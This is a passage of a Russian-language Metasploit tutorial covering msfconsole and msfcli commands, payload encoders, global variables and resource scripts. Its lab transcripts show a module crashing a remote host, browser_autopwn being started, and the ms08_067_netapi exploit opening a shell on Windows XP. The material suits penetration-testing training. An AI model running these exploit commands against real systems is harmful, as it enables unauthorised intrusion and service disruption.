x86/alpha_mixed Alpha2     Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2     Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder
 
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

Команда "check".

Команда "check" проверяет, уязвим ли удаленный хост перед этим эксплоитом.

msf exploit(ms04_045_wins) > show options
 
Module options:
 
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.1.114    yes       The target address
RPORT  42               yes       The target port
 
 
Exploit target:
 
Id Name
-- ----
0 Windows 2000 English
 
 
msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

Настройка глобальных переменных.

В целях экономии времени во время "пентеста", вы можете задать глобальные переменные в msfconsole. Задаются они с помощью команды "setg". Как только переменные заданы, вы можете использовать их в различных модулях. Их можно сохранить для использования в следующий раз. Вы так же можете использовать команду "unsetg" для
отключения глобальных переменных. В приведенных ниже примерах, переменные вводятся с заглавных букв (например: LHOST), но Metasploit является регистронезависимым так что не обязательно так делать.

msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136
msf > save
Saved configuration to: /root/.msf3/config
msf >

Команды "exploit/run".

При запуске эксплоита используйте команду 'exploit', либо 'run'.

msf auxiliary(ms09_001_write) > run
 
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
datalenlow=25535 dataoffset=65535 fillersize=72
rescue
...snip...

Команда "back".

Если вы закончили работать с конкретным модулем или наоборот вы выбрали не верный модуль, вы можете применить команду "back" для выхода из текущего контекста.

msf auxiliary(ms09_001_write) > back
msf >

Команда "resource".

Некоторые атаки, такие как Karmetasploit используют файл ресурсов, который можно загрузить через msfconsole с помощью команды 'resource'. Эти файлы являются основным сценарием для msfconsole. Он выполняет команды в файле в заданной последовательности.

msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
...snip...

Команда "irb".

Выполнение команды "irb" переведет вас в режим сценариев, где вы можете выполнять команды и создавать сценарии на «лету».

msf > irb
[*] Starting IRB shell...
 
>> puts "Hello, metasploit!"
Hello, metasploit!

Msfcli.

msfci

Msfcli мощный интерфейс командной строки фраемверка. Обратите внимание, что при использовании msfcli, переменные присваиваются оператором "=" и что все параметры не являются чувствительными к регистру.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi \ RHOST=192.168.1.115 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.101:54659 -> 192.168.1.115:4444)
 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\WINDOWS\system32>

Если вы не совсем уверены, что параметр относится к конкретному модулю, вы можете добавить опцию `O` в том месте, где вы застряли.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
 
Name    Current Setting Required Description
----    --------------- -------- -----------
RHOST                   yes      The target address
RPORT   445             yes      Set the SMB service port 
SMBPIPE BROWSER         yes      The pipe name to use (BROWSER, SRVSVC)

Для отображения полезных нагрузок, доступных для текущего модуля, используйте опцию 'P' в командной строке ввода параметров.